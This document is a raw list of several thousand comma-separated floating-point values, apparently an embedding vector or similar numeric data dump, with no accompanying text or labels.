0.009246463887393475, 0.0009411930222995579, -0.01870262809097767, -0.035570379346609116, -0.0471038855612278, 0.016055164858698845, -0.03313261643052101, 0.0011705525685101748, -0.0030357367359101772, -0.0012197010219097137, 0.008414216339588165, -0.00023959875397849828, -0.007673713378608227, -0.002100277692079544, 0.011435208842158318, 0.014679007232189178, 0.0006151749403215945, -0.0067071267403662205, -0.0023083393462002277, 0.009574119932949543, -0.005026249215006828, 0.03389278054237366, 0.041861385107040405, 0.027706626802682877, 0.0060452609322965145, 0.015268788672983646, -0.006222195457667112, 0.03273942694067955, -0.024325212463736534, 0.023250499740242958, 0.009174379520118237, 0.012051203288137913, -0.002755590481683612, -0.01543917041271925, 0.02477082423865795, 0.008479747921228409, 0.023800961673259735, 0.005298204254359007, -0.007948944345116615, 0.0034633283503353596, -0.012667196802794933, 0.006002665497362614, 0.011553165502846241, -0.031114252284169197, -0.01612069644033909, 0.025544093921780586, 0.014705220237374306, -0.014338244684040546, 0.025360606610774994, 0.026199406012892723, -0.02862406335771084, 0.00001785471431503538, 0.0005045908619649708, 0.02373543009161949, 0.019069602712988853, 0.007660606876015663, -0.027444500476121902, 0.0025835707783699036, 0.0357014425098896, -0.007667160127311945, -0.04508552327752113, -0.01193324662744999, -0.024194149300456047, 0.010511217638850212, 0.023722324520349503, 0.01105512771755457, 0.029777415096759796, -0.0027048035990446806, -0.000508686585817486, -0.006503979675471783, 0.0006065739435143769, 0.021743278950452805, -0.006762828212231398, -0.007706478703767061, 0.03695964440703392, -0.0014605284668505192, 0.01083887368440628, 0.018741946667432785, -0.013270084746181965, 0.00513765262439847, 0.014338244684040546, -0.022385485470294952, 0.009167826734483242, 0.00816519744694233, 0.02013120986521244, -0.0037778783589601517, -0.026474637910723686, -0.020406441763043404, -0.020406441763043404, -0.015098407864570618, -0.019882190972566605, -0.0010206496808677912, 0.020275378599762917, 0.0048493146896362305, -0.0030259068589657545, 0.0020806181710213423, 0.012267456389963627, -0.0003378956753294915, -0.0580345056951046, 0.013368381187319756, 0.021533578634262085, -0.022962162271142006, 0.008355238474905491, -0.006500703282654285, 0.0037123472429811954, 0.018610883504152298, -0.012627878226339817, -0.008433875627815723, -0.002473806031048298, 0.017483746632933617, -0.007627841085195541, 0.010078711435198784, -0.013918844051659107, -0.0036304329987615347, 0.01100270263850689, 0.011402443051338196, -0.0038925581611692905, -0.019580747932195663, -0.0037123472429811954, 0.009678970091044903, -0.026356682181358337, -0.027706626802682877, 0.005599648226052523, 0.01507219485938549, 0.002401721430942416, 0.028361938893795013, -0.0005041813128627837, -0.0019004072528332472, 0.011808737181127071, -0.024914992973208427, -0.018610883504152298, -0.007365716155618429, -0.005049185361713171, -0.0010100009385496378, -0.012090521864593029, -0.01714298315346241, 0.005701221525669098, -0.019659385085105896, -0.00024164660135284066, -0.000154203298734501, 0.01747063919901848, -0.004891910124570131, 0.015045982785522938, -0.010675045661628246, -0.0016415585996583104, -0.007477119565010071, 0.019777340814471245, 0.007116697262972593, 0.04005271941423416, -0.0018774712225422263, -0.008610810153186321, 0.030537577345967293, -0.005979729350656271, 0.0067071267403662205, 0.010734024457633495, -0.007555756717920303, -0.011376230977475643, -0.03478400409221649, 0.0487290620803833, -0.01972491666674614, -0.004416808485984802, 0.028519215062260628, 0.014744538813829422, 0.00609440915286541, 0.027916327118873596, -0.017221620306372643, 0.0015661976067349315, -0.01305383164435625, 0.0044462974183261395, 0.006395853124558926, -0.025963494554162025, -0.020629247650504112, 0.0045183817856013775, -0.024928100407123566, 0.02014431543648243, -0.007188781630247831, -0.0058388374745845795, 0.006300832610577345, -0.028230875730514526, -0.03499370440840721, 0.021546686068177223, -0.010812661610543728, 0.0034960939083248377, 0.02086516097187996, 0.0039187707006931305, -0.008545279502868652, -0.0056160311214625835, 0.02612076885998249, 0.002627804409712553, -0.03405005484819412, 0.026186300441622734, 0.022673822939395905, -0.011022361926734447, 0.019567640498280525, 0.025452349334955215, 0.012568900361657143, 0.008178303949534893, -0.018361864611506462, 0.011808737181127071, 0.00407604593783617, 0.007418141234666109, 0.028755126520991325, 0.0022624675184488297, 0.00047592094051651657, -0.007922732271254063, -0.024338318035006523, -0.004905016627162695, 0.012955534271895885, 0.013230766169726849, -0.0027179098688066006, 0.00277524976991117, -0.00851251371204853, -0.01322421245276928, 0.02789011411368847, 0.020367123186588287, -0.039082858711481094, -0.025452349334955215, -0.007352610118687153, 0.008892594836652279, 0.03294912725687027, -0.009194038808345795, -0.02446938119828701, -0.03397141769528389, 0.026894038543105125, 0.02519022487103939, 0.022175785154104233, -0.017706552520394325, 0.004262810107320547, -0.012680303305387497, -0.006166493520140648, 0.019489003345370293, 0.00333226565271616, -0.008676341734826565, -0.016448352485895157, 0.026828506961464882, -0.0028194834012538195, 0.010445686057209969, -0.015203258022665977, 0.006074749864637852, -0.005612754262983799, 0.024456273764371872, 0.0010771704837679863, -0.008748426102101803, -0.01161869615316391, -0.015412957407534122, -0.002398445038124919, 0.012149499729275703, 0.009882117621600628, 0.008958126418292522, 0.013447019271552563, 0.010707811452448368, 0.00498037738725543, 0.007811328861862421, -0.002486912067979574, 0.023171860724687576, 0.00018379476387053728, 0.0038040908984839916, 0.0036042204592376947, 0.01445620134472847, -0.016474563628435135, 0.0072084409184753895, -0.010976489633321762, -0.0010607875883579254, -0.004649444483220577, 0.009357866831123829, 0.0060354312881827354, -0.021848129108548164, -0.01431203167885542, 0.014076119288802147, 0.03467915579676628, -0.009233357384800911, -0.024941205978393555, 0.03368308022618294, -0.0024787208531051874, 0.012804812751710415, -0.033918991684913635, 0.005360458977520466, -0.04225457087159157, 0.0030406515579670668, 0.0044626803137362, -0.011664568446576595, 0.010386708192527294, -0.031114252284169197, 0.00039687383105047047, 0.029253164306282997, -0.0040268972516059875, -0.004878804087638855, -0.00042718203621916473, 0.01941036619246006, 0.0037483894266188145, -0.006576064042747021, -0.024456273764371872, 0.018951646983623505, 0.020838947966694832, 0.003148778108879924, -0.002059320453554392, 0.0113106993958354, 0.006703850347548723, -0.0007736787083558738, -0.006602276582270861, -0.027234800159931183, 0.041992444545030594, -0.009049870073795319, 0.0064843203872442245, -0.015190151520073414, 0.023709218949079514, -0.0017906422726809978, -0.010209773667156696, -0.006471214350312948, -0.024128617718815804, 0.02106175385415554, 0.013073490932583809, 0.01403680071234703, -0.014128544367849827, 0.016238652169704437, 0.0011533505748957396, -0.01815216615796089, 0.015963420271873474, -0.00037025174242444336, -0.007981710135936737, -0.01491491962224245, -0.015399851836264133, -0.0037025173660367727, 0.0008113592048175633, 0.01868952251970768, 0.01723472774028778, 0.005350629333406687, 0.012726174667477608, -0.0064024063758552074, -0.0007712212973274291, -0.006926656700670719, 0.013578081503510475, 0.0036533689126372337, 0.018506033346056938, -0.007031506393104792, 0.016251757740974426, 0.0019462790805846453, -0.01806042157113552, -0.009482376277446747, -0.03242487832903862, -0.005960070062428713, -0.007765457034111023, 0.000987884122878313, 0.02085205353796482, 0.013945057056844234, -0.008709107525646687, 0.011435208842158318, 0.006064920220524073, -0.010091817937791348, 0.010098370723426342, 0.01857156492769718, -0.005743816960602999, 0.0006061643362045288, 0.002984949853271246, -0.006893890909850597, 0.00634670490399003, 0.0009010551148094237, 0.020603034645318985, 0.007031506393104792, 0.010203220881521702, -0.0063401516526937485, -0.003994131460785866, -0.007876859977841377, 0.031350165605545044, 0.00454131793230772, 0.00612062169238925, 0.005956793669611216, -0.0005627498612739146, -0.0015072195092216134, -0.03239866718649864, -0.005979729350656271, 0.0036959643475711346, -0.007549203932285309, 0.008866382762789726, 0.019947722554206848, -0.009626545011997223, -0.013473231345415115, -0.0036566455382853746, -0.00887293554842472, 0.02003946714103222, 0.0338403545320034, 0.011350017972290516, 0.010262198746204376, -0.017903147265315056, -0.0015391659690067172, -0.019960828125476837, -0.007844094187021255, 0.008388004265725613, 0.020262273028492928, -0.012575453147292137, 0.010340836830437183, 0.015530914068222046, -0.024233467876911163, -0.004718252457678318, -0.026146981865167618, 0.004167789593338966, -0.023499518632888794, 0.02633046917617321, 0.016644945368170738, -0.013368381187319756, 0.020262273028492928, 0.010570195503532887, -0.009783820249140263, 0.0015391659690067172, -0.0012614772422239184, -0.028257088735699654, 0.015321213752031326, -0.005412884056568146, 0.015675082802772522, 0.0033584781922399998, 0.01633039489388466, -0.016395926475524902, -0.012103627435863018, 0.017260940745472908, -0.0007257589604705572, -0.012070862576365471, -0.02044576033949852, 0.0018823860445991158, 0.025793112814426422, -0.01736578904092312, -0.0027146334759891033, 0.002395168412476778, -0.019331729039549828, -0.0019397259457036853, -0.0037287299055606127, -0.00040567960240878165, -0.019384153187274933, 0.014993557706475258, 0.0031667992006987333, -0.004406978841871023, -0.016081376001238823, -0.0034698813688009977, -0.02520333044230938, 0.025976600125432014, -0.009927988983690739, -0.005537393502891064, 0.007496778853237629, -0.010183561593294144, -0.020812734961509705, -0.003343733726069331, -0.012365752831101418, -0.02964635193347931, 0.0070118471048772335, 0.000359193334588781, 0.010622620582580566, -0.005173694808036089, -0.02528196945786476, -0.004233320709317923, 0.005599648226052523, 0.000007826636647223495, -0.0036697518080472946, -0.018925433978438377, 0.0034534987062215805, -0.022319955751299858, -0.0002879280655179173, 0.014600370079278946, 0.019554534927010536, 0.026304256170988083, 0.008486300706863403, -0.0017758978065103292, 0.009508589282631874, 0.00873531959950924, -0.01331595703959465, 0.004505275748670101, 0.012437837198376656, -0.0058027952909469604, 0.009849351830780506, 0.021232135593891144, 0.009010551497340202, 0.0026818676851689816, -0.010491558350622654, 0.010753683745861053, -0.0034862642642110586, 0.015098407864570618, 0.0174444280564785, 0.005304757505655289, -0.007464013062417507, -0.0067071267403662205, -0.0041776192374527454, 0.024443168193101883, -0.01868952251970768, -0.002175638685002923, 0.0029685671906918287, 0.016474563628435135, -0.0010968298884108663, -0.00913506094366312, -0.010858533903956413, 0.010675045661628246, -0.009639651514589787, -0.02034091018140316, -0.009062976576387882, 0.012097074650228024, -0.0038303034380078316, -0.007555756717920303, 0.006359810940921307, -0.013433912768959999, -0.008794298395514488, 0.004823102615773678, 0.005491521675139666, 0.03446945548057556, 0.001197584206238389, -0.014731432311236858, -0.02436453104019165, 0.03284427896142006, 0.012090521864593029, -0.0008256941800937057, 0.0036173267289996147, -0.00632049236446619, 0.024220362305641174, -0.005255608819425106, 0.0069856345653533936, -0.0006942220497876406, -0.022870417684316635, 0.013165234588086605, 0.019135134294629097, -0.006874231621623039, -0.007129803765565157, -0.0032192242797464132, 0.0012770409230142832, 0.01203154306858778, -0.021808810532093048, 0.002522954484447837, 0.019580747932195663, 0.030930764973163605, 0.017837615683674812, 0.008971232920885086, 0.007457459811121225, -0.00029407162219285965, -0.005344076082110405, -0.005521010607481003, -0.0038696222472935915, 0.006661254912614822, -0.011887374334037304, -0.011336911469697952, 0.0008187314379028976, 0.011441761627793312, 0.031035615131258965, -0.003296223469078541, -0.0009534801356494427, 0.01048500556498766, -0.0033224360086023808, -0.009062976576387882, 0.004665827378630638, 0.038060568273067474, 0.03148122876882553, -0.014980451203882694, 0.0016145269619300961, -0.00637291744351387, -0.04862421005964279, -0.0031176507472991943, -0.018506033346056938, -0.013433912768959999, -0.0013859865721315145, 0.016081376001238823, 0.0023869769647717476, -0.020825842395424843, 0.010616067796945572, 0.02158600464463234, -0.0098559046164155, -0.0036173267289996147, 0.0028784614987671375, -0.0004914845922030509, 0.007293631788343191, -0.007627841085195541, 0.011743205599486828, -0.004325064830482006, -0.004377489909529686, -0.0032061180099844933, 0.0010870001278817654, 0.012496815994381905, -0.012483709491789341, -0.0029013976454734802, 0.007922732271254063, 0.006723509635776281, 0.010052498430013657, -0.0035223064478486776, 0.004777230322360992, -0.0008048060699366033, -0.01817837730050087, -0.01300140656530857, 0.008021028712391853, 0.01880747824907303, -0.014692113734781742, 0.028230875730514526, 0.0028227600269019604, -0.003070140490308404, -0.00003977953747380525, -0.011638355441391468, -0.024207254871726036, -0.018532246351242065, -0.000980511773377657, -0.020707884803414345, 0.0025606348644942045, -0.016238652169704437, -0.021336985751986504, 0.010616067796945572, 0.016369713470339775, -0.038768306374549866, -0.00008089017501333728, -0.002070788526907563, 0.004905016627162695, -0.007273972500115633, -0.007863753475248814, 0.007562309969216585, -0.017077451571822166, 0.0047149755991995335, 0.0009411930222995579, 0.009541355073451996, 0.01269340980798006, -0.004538041539490223, -0.0073067378252744675, 0.011212402023375034, 0.014128544367849827, 0.01331595703959465, 0.017601702362298965, -0.013388041406869888, -0.008990892209112644, 0.008034135214984417, 0.0014130183262750506, -0.014390669763088226, -0.01806042157113552, -0.02043265476822853, 0.0018741947133094072, 0.014207182452082634, 0.009836245328187943, 0.012752387672662735, -0.018243908882141113, -0.000020030558516737074, 0.008145538158714771, -0.006854572333395481, -0.018296334892511368, -0.017942465841770172, 0.006100962404161692, 0.02820466458797455, 0.03656645491719246, 0.0021281284280121326, -0.018951646983623505, -0.01048500556498766, 0.0057503702118992805, 0.0012672111624851823, 0.015137726441025734, -0.0198297668248415, 0.021546686068177223, -0.007693372666835785, 0.02395823784172535, -0.0018807478481903672, 0.02188744768500328, -0.018532246351242065, -0.010294964537024498, -0.008414216339588165, -0.00908263586461544, -0.004796890076249838, -0.01327663753181696, -0.00019536513718776405, 0.026382895186543465, 0.005291651003062725, -0.005887985695153475, 0.015032876282930374, 0.008794298395514488, 0.002863717032596469, -0.015426063910126686, -0.010439133271574974, -0.026461532339453697, -0.019973935559391975, 0.013447019271552563, 0.014757644385099411, -0.00019710580818355083, -0.008859829045832157, -0.0009600332705304027, 0.003342095296829939, -0.024613549932837486, -0.00939063262194395, 0.0008486300939694047, 0.000531622557900846, 0.010969936847686768, 0.007024953607469797, -0.001017373171634972, 0.017811402678489685, 0.004718252457678318, 0.015399851836264133, 0.0035583486314862967, 0.010340836830437183, 0.0037680487148463726, 0.014875601045787334, 0.0029013976454734802, -0.006100962404161692, 0.01723472774028778, -0.01440377626568079, 0.0235519427806139, 0.0008928637253120542, -0.0024557847063988447, 0.006379470229148865, -0.0070380596444010735, 0.017116770148277283, -0.0017824509413912892, -0.0003809005720540881, 0.017588596791028976, -0.004767400678247213, 0.01879437267780304, -0.012057756073772907, 0.014547945000231266, 0.032267604023218155, 0.019331729039549828, -0.019869085401296616, 0.002119936980307102, -0.01950210891664028, 0.006461384240537882, 0.00897778570652008, 0.0035190298222005367, -0.014718325808644295, -0.0010935532627627254, 0.015216363593935966, -0.009377526119351387, -0.013591188006103039, -0.0035386893432587385, -0.0038073675241321325, -0.004344724118709564, -0.014547945000231266, -0.0037942612543702126, 0.014757644385099411, -0.017680339515209198, 0.024954311549663544, -0.010098370723426342, -0.015727506950497627, 0.021966086700558662, 0.019475897774100304, 0.024298999458551407, -0.0035255830734968185, -0.007346056867390871, -0.011920140124857426, -0.02912210114300251, -0.0073788221925497055, 0.0045183817856013775, -0.007097037974745035, 0.019371047616004944, 0.017077451571822166, -0.0007937476621009409, 0.007241206709295511, 0.006526915822178125, 0.007778563071042299, -0.0020625970792025328, -0.0018709180876612663, -0.02022295445203781, -0.0035550720058381557, -0.011703887023031712, 0.0001267620682483539, 0.007031506393104792, 0.00986245833337307, -0.00975105445832014, -0.0036042204592376947, -0.023814067244529724, 0.004092428367584944, 0.0030717789195477962, 0.028676489368081093, 0.00856493879109621, 0.002182191703468561, -0.023276710882782936, 0.009528248570859432, 0.006595723796635866, -0.012254349887371063, 0.00960033293813467, -0.017195409163832664, -0.005829007364809513, -0.008597704581916332, -0.02397134341299534, 0.022018510848283768, 0.011959458701312542, -0.008007923141121864, -0.008951573632657528, -0.004210385028272867, -0.013388041406869888, 0.004043280147016048, -0.010806108824908733, 0.019554534927010536, 0.011245167814195156, -0.011893928050994873, -0.032975342124700546, -0.0058748796582221985, -0.015858570113778114, -0.008578045293688774, 0.005570158828049898, -0.0018447055481374264, -0.0006278716027736664, -0.039371196180582047, 0.00048370278091169894, -0.010983043350279331, 0.02457423135638237, 0.008446982130408287, 0.012509921565651894, -0.008650129660964012, 0.008918807841837406, -0.01579303853213787, 0.022319955751299858, -0.009836245328187943, -0.02789011411368847, -0.004967271350324154, 0.018125953152775764, 0.01786382682621479, -0.012254349887371063, 0.006353257689625025, -0.00804724171757698, -0.012129840441048145, 0.0004114135808777064, -0.02694646269083023, 0.007719585206359625, 0.0008904063142836094, -0.008754979819059372, 0.03224139288067818, -0.0016956219915300608, -0.03777223080396652, -0.00866978894919157, -0.0058027952909469604, 0.0023935299832373857, 0.007018400356173515, 0.0029538224916905165, 0.011690780520439148, 0.01702502742409706, 0.0009968946687877178, -0.009141613729298115, 0.018768159672617912, -0.007005294319242239, -0.011939799413084984, -0.012254349887371063, -0.010648833587765694, -0.009017104282975197, 0.014692113734781742, 0.014705220237374306, -0.03441702947020531, 0.002493465319275856, 0.01512461993843317, -0.005127822980284691, -0.03491506725549698, 0.009698629379272461, 0.0025671878829598427, -0.00908263586461544, -0.004033450502902269, -0.01992150954902172, -0.041992444545030594, -0.024705292657017708, -0.00410225847736001, -0.0007650777115486562, 0.004983654245734215, -0.010124582797288895, 0.007824434898793697, -0.01245094370096922, -0.01435135118663311, 0.002388615161180496, -0.006854572333395481, 0.010779895819723606, -0.019685598090291023, -0.0082569420337677, 0.025950387120246887, -0.03116667829453945, -0.018938541412353516, -0.014901814050972462, 0.007293631788343191, 0.020052572712302208, 0.014600370079278946, -0.005422713700681925, -0.02115349844098091, -0.004190725740045309, -0.010281858034431934, 0.008381451480090618, 0.001023107091896236, -0.008001369424164295, 0.020812734961509705, -0.0020920862443745136, -0.019397258758544922, 0.004252980463206768, -0.010622620582580566, -0.005753646604716778, 0.025242650881409645, -0.013643613085150719, -0.016776008531451225, 0.015032876282930374, -0.039607107639312744, -0.014796963892877102, -0.0014801878714933991, 0.0018807478481903672, -0.008538725785911083, 0.018532246351242065, -0.001479368656873703, -0.02559651806950569, -0.0014547944301739335, -0.021428728476166725, 0.007673713378608227, -0.007647500839084387, 0.018296334892511368, -0.007876859977841377, 0.030170602723956108, -0.012686856091022491, 0.016880858689546585, 0.0033617548178881407, -0.012870344333350658, -0.024836355820298195, -0.00047059651114977896, -0.0008609172073192894, -0.01331595703959465, -0.007903072983026505, 0.010714364238083363, 0.011690780520439148, -0.024298999458551407, 0.00868289452046156, 0.0033158829901367426, -0.0010771704837679863, -0.020419547334313393, 0.0015129534294828773, 0.01867641508579254, 0.005465309135615826, -0.014587263576686382, 0.0006852114456705749, -0.006867678370326757, 0.011526952497661114, -0.010616067796945572, -0.0017464086413383484, 0.00024328488507308066, 0.014534838497638702, -0.023787856101989746, -0.010825768113136292, 0.011454868130385876, -0.006022324785590172, -0.016356607899069786, -0.006972528528422117, 0.0030848851893097162, 0.0041251941584050655, 0.006730062887072563, 0.021848129108548164, 0.011959458701312542, 0.011350017972290516, -0.016776008531451225, 0.027706626802682877, 0.000993618043139577, -0.0038368566893041134, -0.017496852204203606, 0.002108468906953931, 0.0004146901483181864, 0.0027768881991505623, 0.002378785517066717, 0.011284487321972847, -0.02633046917617321, -0.007005294319242239, -0.011441761627793312, 0.00934476125985384, -0.0038368566893041134, 0.005399777553975582, -0.035675231367349625, -0.010439133271574974, 0.009711735881865025, 0.026894038543105125, 0.008060348220169544, -0.007732691243290901, 0.0069397627376019955, 0.006369640585035086, -0.009646205231547356, -0.0010394899873062968, -0.005127822980284691, 0.012477155774831772, 0.033185042440891266, 0.0075033316388726234, -0.0322151780128479, 0.016382820904254913, -0.018637096509337425, 0.018728841096162796, 0.008650129660964012, 0.013355275616049767, -0.008211069740355015, 0.01291621569544077, -0.006946315988898277, -0.01208396814763546, 0.01110755279660225, -0.010969936847686768, 0.01870262809097767, 0.02187434211373329, -0.011173083446919918, -0.009233357384800911, 0.023984448984265327, -0.011042021214962006, -0.005088503938168287, -0.011808737181127071, -0.001286051468923688, -0.0008748426334932446, 0.02290973626077175, 0.011592484079301357, -0.01733957789838314, 0.008715660311281681, -0.020603034645318985, -0.011625249870121479, 0.0025671878829598427, -0.012254349887371063, -0.001073074759915471, 0.0041612363420426846, -0.008545279502868652, -0.02643531933426857, -0.0004652721108868718, -0.00861736387014389, 0.021638428792357445, 0.0025802941527217627, -0.014692113734781742, 0.0103801554068923, -0.022123361006379128, -0.0006229567807167768, 0.013191447593271732, -0.013525656424462795, -0.009619992226362228, 0.01212328765541315, 0.025937281548976898, 0.00568156223744154, 0.0009502036264166236, -0.00965275801718235, 0.015871677547693253, -0.0036664751823991537, -0.016146907582879066, -0.013525656424462795, -0.007529544178396463, -0.022844204679131508, 0.027837688103318214, -0.012234690599143505, 0.002175638685002923, -0.0018152164993807673, 0.0007265781168825924, 0.004397149197757244, 0.02859785221517086, -0.022385485470294952, -0.023460200056433678, -0.010098370723426342, 0.007424694485962391, 0.03211032971739769, -0.007201888132840395, 0.0009846074972301722, 0.009246463887393475, -0.011146871373057365, 0.01621243916451931, 0.0042497036047279835, -0.040419694036245346, -0.007496778853237629, -0.010760236531496048, -0.007359162904322147, -0.0005586541956290603, 0.012903109192848206, -0.003260181285440922, -0.005196630489081144, 0.006192706059664488, -0.004416808485984802, -0.04005271941423416, 0.011697334237396717, 0.012018437497317791, -0.00980347953736782, 0.0012229775311425328, 0.012195372022688389, -0.011677674949169159, 0.017509959638118744, -0.012935874983668327, -0.002899759216234088, 0.01006560493260622, -0.010760236531496048, -0.0019413642585277557, 0.011507293209433556, 0.005796242039650679, -0.0290172528475523, 0.0013605932472273707, 0.03895179554820061, -0.011159977875649929, -0.00001048244575940771, 0.0020281930919736624, -0.004934505559504032, -0.021730173379182816, 0.009351314045488834, 0.016160015016794205, 0.009770714677870274, 0.00003094817293458618, -0.015032876282930374, -0.0460553839802742, -0.026723656803369522, -0.003168437397107482, -0.004246427211910486, 0.00040506524965167046, -0.02912210114300251, 0.012713069096207619, -0.03108804114162922, -0.006032154429703951, 0.0014261244796216488, -0.001436773338355124, 0.006946315988898277, -0.0031078211031854153, -0.00225755269639194, 0.019043391570448875, 0.022280635312199593, 0.005127822980284691, 0.0254130307585001, -0.004174342844635248, 0.01047845184803009, 0.0032012031879276037, -0.00016259949188679457, -0.012411625124514103, 0.005950240418314934, -0.009777267463505268, 0.010576749220490456, 0.00273593096062541, 0.013879525475203991, 0.0003600124910008162, 0.009482376277446747, -0.0017136430833488703, 0.024312105029821396, -0.006736615672707558, 0.00524250278249383, 0.004655997734516859, 0.007824434898793697, -0.007922732271254063, 0.009213698096573353, -0.0029276099521666765, -0.0021117455326020718, -0.005904368590563536, -0.0018938541179522872, -0.00970518309623003, -0.0131717873737216, 0.0017627915367484093, -0.011841502971947193, -0.002999694552272558, -0.025570306926965714, -0.01419407594949007, -0.00041387102100998163, -0.01198567170649767, 0.02572758123278618, -0.01909581571817398, -0.007614735048264265, -0.0009067891514860094, 0.006723509635776281, -0.00443646777421236, -0.005265438463538885, -0.001443326473236084, 0.012981747277081013, 0.0002756409521680325, -0.000781050999648869, 0.004891910124570131, -0.009043317288160324, -0.007300185039639473, 0.0048493146896362305, 0.0018938541179522872, 0.019895296543836594, -0.0019774064421653748, -0.006979081779718399, 0.0023837003391236067, 0.012339540757238865, 0.0029177803080528975, 0.0025344223249703646, 0.007850647903978825, -0.01136312447488308, 0.009121954441070557, 0.0032274157274514437, 0.0017595149111002684, 0.007811328861862421, -0.005095057189464569, -0.0011345103848725557, 0.01942347176373005, 0.019069602712988853, 0.022254424169659615, -0.01089785248041153, 0.004406978841871023, -0.00606819661334157, 0.008211069740355015, 0.006677637808024883, -0.0015301554230973125, -0.01300140656530857, -0.009246463887393475, 0.010091817937791348, -0.013748463243246078, -0.017942465841770172, 0.02416793629527092, 0.004613402299582958, -0.01326353196054697, -0.0008187314379028976, -0.019122028723359108, -0.020838947966694832, 0.007621288299560547, 0.009377526119351387, 0.006906997412443161, -0.0031700758263468742, 0.004623231943696737, 0.005262162070721388, 0.01260166522115469, -0.023184968158602715, 0.018348759040236473, 0.014561050571501255, -0.0009461079025641084, 0.02065546065568924, -0.010032839141786098, -0.0008355238242074847, -0.011212402023375034, 0.012562346644699574, 0.002273935591802001, -0.03533446788787842, 0.026264937594532967, 0.002293594880029559, 0.005258885212242603, -0.0013327425112947822, 0.012057756073772907, -0.0075033316388726234, 0.000011295186595816631, 0.010602961294353008, -0.006648148410022259, 0.01507219485938549, 0.008938467130064964, 0.020878266543149948, 0.011966012418270111, -0.0069856345653533936, -0.002123213605955243, 0.0231456495821476, 0.00010904815280809999, 0.00549807446077466, -0.018191484734416008, 0.014941132627427578, 0.01450862642377615, -0.011428656056523323, 0.00939718633890152, -0.005049185361713171, 0.0041153645142912865, -0.02538681961596012, 0.006133728194981813, 0.006566234398633242, -0.031035615131258965, -0.005154035519808531, -0.006802147254347801, 0.010786449536681175, -0.0029816734604537487, 0.0019708534236997366, 0.008630470372736454, 0.0017808126285672188, 0.005478415172547102, 0.02487567439675331, -0.009724842384457588, 0.016671158373355865, 0.012831024825572968, 0.000728216371499002, -0.007811328861862421, 0.0025344223249703646, 0.003209394635632634, 0.01435135118663311, -0.01921377144753933, -0.001518687466159463, 0.0030898000113666058, 0.00990832969546318, 0.03308019042015076, 0.019122028723359108, 0.0113106993958354, -0.03014438971877098, -0.004449574276804924, 0.013073490932583809, 0.0037582190707325935, -0.01022288016974926, -0.004986930638551712, 0.0037221768870949745, 0.019593853503465652, -0.006952869240194559, 0.007411587983369827, 0.040524546056985855, 0.006127174943685532, -0.0043578301556408405, 0.014364456757903099, 0.004426638130098581, 0.007431247271597385, 0.02644842490553856, -0.006343428045511246, 0.018820583820343018, 0.012726174667477608, -0.01414165087044239, -0.00217072363011539, -0.0231456495821476, -0.009023657999932766, 0.010242539457976818, 0.007922732271254063, -0.0011762864887714386, 0.0040531097911298275, -0.037850867956876755, 0.004272639751434326, -0.011703887023031712, 0.0011001063976436853, 0.011841502971947193, -0.007201888132840395, 0.005753646604716778, -0.008263494819402695, -0.0018627267563715577, -0.007260865997523069, -0.0003172123688273132, 0.005363735370337963, -0.025766899809241295, 0.0036009440664201975, -0.0030046093743294477, 0.007201888132840395, 0.004380766302347183, -0.030406516045331955, 0.0008093113428913057, 0.022700035944581032, 0.01213639322668314, 0.0029669287614524364, 0.0038040908984839916, -0.016173120588064194, -0.004773953929543495, -0.01063572708517313, -0.008342131972312927, 0.0006270524463616312, -0.011913587339222431, 0.008696001023054123, 0.015504701063036919, -0.00010239263065159321, -0.00991488341242075, -0.00827004760503769, -0.031559865921735764, 0.01612069644033909, -0.0016497500473633409, -0.010747130028903484, 0.002303424524143338, -0.015714401379227638, -0.003466604743152857, 0.007051166146993637, -0.015779932960867882, 0.005249055568128824, 0.007346056867390871, 0.011042021214962006, -0.0009739586967043579, -0.01203154306858778, -0.015937207266688347, 0.0006639137864112854, -0.006284450180828571, 0.006631765980273485, -0.007201888132840395, 0.00882051046937704, 0.004662550985813141, -0.0012606580276042223, -0.021952979266643524, -0.01972491666674614, 0.0021182987838983536, -0.014325138181447983, -0.0032913086470216513, -0.004495446104556322, -0.016579413786530495, 0.03436460345983505, 0.002558996668085456, -0.020498184487223625, -0.0032683727331459522, 0.016789114102721214, -0.006749722175300121, -0.022018510848283768, 0.013656719587743282, 0.008197963237762451, 0.0034502220805734396, -0.03190062940120697, 0.015661977231502533, -0.014233394525945187, -0.011749759316444397, 0.010865086689591408, 0.02053750306367874, -0.0013622315600514412, 0.018728841096162796, 0.007103591226041317, -0.009357866831123829, -0.005887985695153475, 0.013420806266367435, 0.00042103847954422235, 0.021441835910081863, -0.009475823491811752, -0.013348721899092197, 0.011664568446576595, 0.01331595703959465, 0.019174452871084213, 0.02043265476822853, -0.004878804087638855, -0.0074050347320735455, 0.014652795158326626, 0.006382747087627649, 0.015740614384412766, -0.010865086689591408, 0.0019430025713518262, -0.024823250249028206, 0.006821806542575359, 0.00115498888771981, 0.0038696222472935915, -0.000058773370255948976, -0.009351314045488834, 0.021559791639447212, -0.00492795230820775, 0.010609515011310577, -0.0030717789195477962, -0.0038532393518835306, 0.011291040107607841, -0.019148239865899086, 0.00016147317364811897, 0.013827100396156311, -0.01063572708517313, -0.015924101695418358, -0.02996090240776539, -0.005055738613009453, -0.012077415362000465, 0.00007592413749080151, -0.004734635353088379, 0.018715733662247658, 0.006710403133183718, 0.006202535703778267, -0.027313439175486565, 0.0030914382077753544, 0.018086634576320648, 0.011192742735147476, 0.01110099907964468, -0.024534912779927254, -0.004816549364477396, -0.026592593640089035, -0.023918917402625084, -0.013564975932240486, 0.010825768113136292, -0.006821806542575359, -0.00461995555087924, -0.00939718633890152, -0.0020298315212130547, -0.01847982220351696, -0.013165234588086605, 0.022359274327754974, 0.005724157672375441, -0.005701221525669098, -0.005484968423843384, -0.0027113568503409624, -0.0021789150778204203, -0.009934542700648308, 0.022031616419553757, 0.012909662909805775, -0.007660606876015663, -0.007929285056889057, -0.0016006015939638019, 0.022254424169659615, 0.008021028712391853, 0.008899148553609848, -0.008538725785911083, -0.004243150353431702, 0.02747071348130703, 0.0021035540848970413, 0.00220512761734426, 0.011887374334037304, 0.01643524505198002, -0.000023294323909794912, -0.0030422897543758154, 0.011808737181127071, 0.016762902960181236, 0.01775897666811943, -0.0007712212973274291, -0.00928578246384859, 0.0013728804187849164, -0.013643613085150719, 0.020209847018122673, 0.021140391007065773, -0.005022972822189331, -0.005265438463538885, -0.007287078537046909, -0.00975760817527771, 0.008833616971969604, 0.006569511257112026, 0.008315919898450375, 0.020917585119605064, -0.0006880784640088677, -0.01609448343515396, -0.007817882113158703, 0.015373638831079006, 0.0008314281585626304, -0.02551788091659546, -0.038453757762908936, 0.003967919386923313, -0.000511553545948118, -0.019056497141718864, 0.0031143741216510534, 0.004859144799411297, -0.013643613085150719, -0.022372379899024963, 